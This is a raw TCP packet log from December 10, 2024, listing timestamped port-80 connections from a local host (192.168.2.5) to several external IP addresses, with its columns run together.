                                                                            Dec 10, 2024 16:24:05.304431915 CET4980880192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:05.423806906 CET8049808180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:05.423943043 CET4980880192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:05.439795971 CET4980880192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:05.559232950 CET8049808180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:05.559274912 CET8049808180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:06.935085058 CET8049808180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:06.935237885 CET8049808180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:06.935286999 CET4980880192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:06.941821098 CET4980880192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:07.960479975 CET4981680192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:08.080162048 CET8049816180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:08.080256939 CET4981680192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:08.087457895 CET4981680192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:08.207720995 CET8049816180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:09.611648083 CET8049816180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:09.611891985 CET8049816180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:09.611947060 CET4981680192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:09.614856958 CET4981680192.168.2.5180.178.39.236
                                                                            Dec 10, 2024 16:24:09.734793901 CET8049816180.178.39.236192.168.2.5
                                                                            Dec 10, 2024 16:24:15.096611977 CET4983380192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:15.216079950 CET8049833203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:15.216176033 CET4983380192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:15.241458893 CET4983380192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:15.360949039 CET8049833203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:16.446311951 CET8049833203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:16.446536064 CET8049833203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:16.446619987 CET4983380192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:16.754376888 CET4983380192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:17.773263931 CET4983980192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:17.896581888 CET8049839203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:17.896718025 CET4983980192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:17.907798052 CET4983980192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:18.027374983 CET8049839203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:19.126084089 CET8049839203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:19.126315117 CET8049839203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:19.126390934 CET4983980192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:19.410645008 CET4983980192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:20.429920912 CET4984580192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:20.549226046 CET8049845203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:20.549362898 CET4984580192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:20.560628891 CET4984580192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:20.680042982 CET8049845203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:20.680147886 CET8049845203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:21.845319033 CET8049845203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:21.845525026 CET8049845203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:21.845643044 CET4984580192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:22.066912889 CET4984580192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:23.085788012 CET4985480192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:23.205331087 CET8049854203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:23.205461979 CET4985480192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:23.212694883 CET4985480192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:23.332088947 CET8049854203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:24.436480999 CET8049854203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:24.436696053 CET8049854203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:24.436749935 CET4985480192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:24.439675093 CET4985480192.168.2.5203.161.49.193
                                                                            Dec 10, 2024 16:24:24.559180975 CET8049854203.161.49.193192.168.2.5
                                                                            Dec 10, 2024 16:24:30.501216888 CET4987280192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:30.623291969 CET8049872217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:30.623379946 CET4987280192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:30.634263039 CET4987280192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:30.753628016 CET8049872217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:31.924860001 CET8049872217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:31.925151110 CET8049872217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:31.925226927 CET4987280192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:32.145005941 CET4987280192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:33.164098024 CET4987880192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:33.284461021 CET8049878217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:33.284631968 CET4987880192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:33.295638084 CET4987880192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:33.417248011 CET8049878217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:34.583764076 CET8049878217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:34.584109068 CET8049878217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:34.584290028 CET4987880192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:34.801357031 CET4987880192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:35.857105017 CET4988480192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:35.976696968 CET8049884217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:35.976778984 CET4988480192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:35.988241911 CET4988480192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:36.107713938 CET8049884217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:36.107825041 CET8049884217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:37.361088991 CET8049884217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:37.361345053 CET8049884217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:37.361407995 CET4988480192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:37.504436970 CET4988480192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:38.525901079 CET4989480192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:38.650489092 CET8049894217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:38.650592089 CET4989480192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:38.658546925 CET4989480192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:38.780348063 CET8049894217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:39.938147068 CET8049894217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:39.938679934 CET8049894217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:39.938823938 CET4989480192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:39.938865900 CET8049894217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:39.939116001 CET4989480192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:39.942086935 CET4989480192.168.2.5217.160.0.132
                                                                            Dec 10, 2024 16:24:40.062746048 CET8049894217.160.0.132192.168.2.5
                                                                            Dec 10, 2024 16:24:45.920759916 CET4991180192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:46.040824890 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:46.040966988 CET4991180192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:46.054102898 CET4991180192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:46.174791098 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.191873074 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.192409992 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.192423105 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.192471981 CET4991180192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:47.193926096 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.193939924 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.193970919 CET4991180192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:47.196099043 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.196110964 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.196146965 CET4991180192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:47.198530912 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.198549032 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.198576927 CET4991180192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:47.200855017 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.200928926 CET4991180192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:47.313241959 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.313757896 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.313817978 CET4991180192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:47.317476034 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.363698959 CET4991180192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:47.383873940 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.384399891 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.384458065 CET4991180192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:47.388067961 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.389267921 CET8049911216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:47.389355898 CET4991180192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:47.566924095 CET4991180192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:48.585500002 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:48.704879999 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:48.704996109 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:48.716372013 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:48.835966110 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.853225946 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.853595018 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.853606939 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.853750944 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:49.854933023 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.854944944 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.855151892 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:49.857290030 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.857301950 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.857378006 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:49.859184980 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.859204054 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.859304905 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:49.861547947 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.861643076 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:49.973323107 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.973762989 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:49.973834038 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:49.977407932 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:50.019942999 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:50.045284033 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:50.045783997 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:50.045847893 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:50.049329996 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:50.050548077 CET8049917216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:50.050879002 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:50.223110914 CET4991780192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:51.242950916 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:51.362663984 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:51.362746000 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:51.378676891 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:51.500056028 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:51.500087976 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.580269098 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.580873966 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.580885887 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.581038952 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:52.583044052 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.583056927 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.585361958 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.585374117 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.585562944 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:52.587795019 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.587806940 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.590200901 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:52.590471983 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.594161034 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:52.704040051 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.704963923 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.706207037 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:52.773725986 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.776273012 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.776330948 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:52.777674913 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.777686119 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.777735949 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:52.781819105 CET8049923216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:52.781898022 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:52.896323919 CET4992380192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:53.913645983 CET4993480192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:54.033539057 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:54.037209988 CET4993480192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:54.044536114 CET4993480192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:54.165134907 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:55.166249990 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:55.166932106 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:55.166944027 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:55.167017937 CET4993480192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:55.169370890 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:55.169384003 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:55.169409037 CET4993480192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:55.171355009 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:55.171366930 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:24:55.171407938 CET4993480192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:55.175462008 CET4993480192.168.2.5216.40.34.41
                                                                            Dec 10, 2024 16:24:55.295464039 CET8049934216.40.34.41192.168.2.5
                                                                            Dec 10, 2024 16:25:00.689793110 CET4994580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:00.913428068 CET80499453.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:00.913500071 CET4994580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:00.930907011 CET4994580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:01.050132990 CET80499453.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:02.442109108 CET4994580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:02.610971928 CET80499453.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:03.461167097 CET4995580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:03.586097002 CET80499553.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:03.586196899 CET4995580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:03.597537041 CET4995580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:03.720109940 CET80499553.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:04.696904898 CET80499553.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:04.697022915 CET80499553.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:04.697169065 CET4995580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:05.113751888 CET4995580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:06.132576942 CET4996180192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:06.252741098 CET80499613.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:06.253398895 CET4996180192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:06.272141933 CET4996180192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:06.392450094 CET80499613.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:06.392465115 CET80499613.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:07.347980976 CET80499613.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:07.348056078 CET80499613.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:07.348123074 CET4996180192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:07.634676933 CET80499613.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:07.634731054 CET4996180192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:07.785746098 CET4996180192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:08.804914951 CET4996880192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:09.057667017 CET80499683.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:09.057743073 CET4996880192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:09.065984964 CET4996880192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:09.186410904 CET80499683.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:19.188924074 CET80499683.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:19.188941002 CET80499683.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:19.189090014 CET4996880192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:19.192341089 CET4996880192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:19.352365017 CET80499683.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:22.824421883 CET80499453.33.130.190192.168.2.5
                                                                            Dec 10, 2024 16:25:22.826234102 CET4994580192.168.2.53.33.130.190
                                                                            Dec 10, 2024 16:25:24.660504103 CET4999580192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:24.781789064 CET804999546.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:24.781955004 CET4999580192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:24.796169043 CET4999580192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:24.915539980 CET804999546.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:26.302170992 CET4999580192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:26.444973946 CET804999546.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:26.445143938 CET4999580192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:27.321480989 CET4999680192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:27.441878080 CET804999646.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:27.441948891 CET4999680192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:27.455949068 CET4999680192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:27.583658934 CET804999646.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:28.958389997 CET4999680192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:29.078142881 CET804999646.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:29.078255892 CET4999680192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:29.976552010 CET4999780192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:30.095957994 CET804999746.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:30.096096992 CET4999780192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:30.110182047 CET4999780192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:30.229554892 CET804999746.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:30.229624033 CET804999746.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:31.613836050 CET4999780192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:31.733447075 CET804999746.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:31.733537912 CET4999780192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:32.634183884 CET4999880192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:32.753469944 CET804999846.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:32.754312992 CET4999880192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:32.770186901 CET4999880192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:32.889481068 CET804999846.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:40.784006119 CET804999846.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:40.784101009 CET804999846.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:40.784275055 CET4999880192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:40.787024021 CET4999880192.168.2.546.38.243.234
                                                                            Dec 10, 2024 16:25:40.906336069 CET804999846.38.243.234192.168.2.5
                                                                            Dec 10, 2024 16:25:46.920365095 CET4999980192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:47.042906046 CET804999974.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:47.042983055 CET4999980192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:47.059088945 CET4999980192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:47.180469990 CET804999974.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:48.568365097 CET4999980192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:48.688707113 CET804999974.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:48.689929962 CET4999980192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:49.587327957 CET5000080192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:49.706986904 CET805000074.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:49.707067013 CET5000080192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:49.721002102 CET5000080192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:49.840517044 CET805000074.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:51.223206997 CET5000080192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:51.230290890 CET805000074.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:51.230348110 CET5000080192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:51.230396032 CET805000074.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:51.230451107 CET5000080192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:51.343481064 CET805000074.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:51.343537092 CET5000080192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:52.242110968 CET5000180192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:52.361376047 CET805000174.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:52.361660004 CET5000180192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:52.373214006 CET5000180192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:52.492641926 CET805000174.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:52.493120909 CET805000174.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:53.879832029 CET5000180192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:54.001362085 CET805000174.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:54.001631021 CET5000180192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:54.898746967 CET5000280192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:55.018651962 CET805000274.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:55.018965960 CET5000280192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:55.028652906 CET5000280192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:55.149743080 CET805000274.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:56.549738884 CET805000274.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:56.550185919 CET805000274.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:25:56.550295115 CET5000280192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:56.552856922 CET5000280192.168.2.574.48.34.43
                                                                            Dec 10, 2024 16:25:56.673989058 CET805000274.48.34.43192.168.2.5
                                                                            Dec 10, 2024 16:26:03.319787025 CET5000380192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:03.440805912 CET805000323.167.152.41192.168.2.5
                                                                            Dec 10, 2024 16:26:03.440910101 CET5000380192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:03.454128027 CET5000380192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:03.574112892 CET805000323.167.152.41192.168.2.5
                                                                            Dec 10, 2024 16:26:04.339154005 CET805000323.167.152.41192.168.2.5
                                                                            Dec 10, 2024 16:26:04.340358973 CET5000380192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:04.958014011 CET5000380192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:05.079885960 CET805000323.167.152.41192.168.2.5
                                                                            Dec 10, 2024 16:26:05.978256941 CET5000480192.168.2.523.167.152.41
                                                                            Dec 10, 2024 16:26:06.097762108 CET805000423.167.152.41192.168.2.5
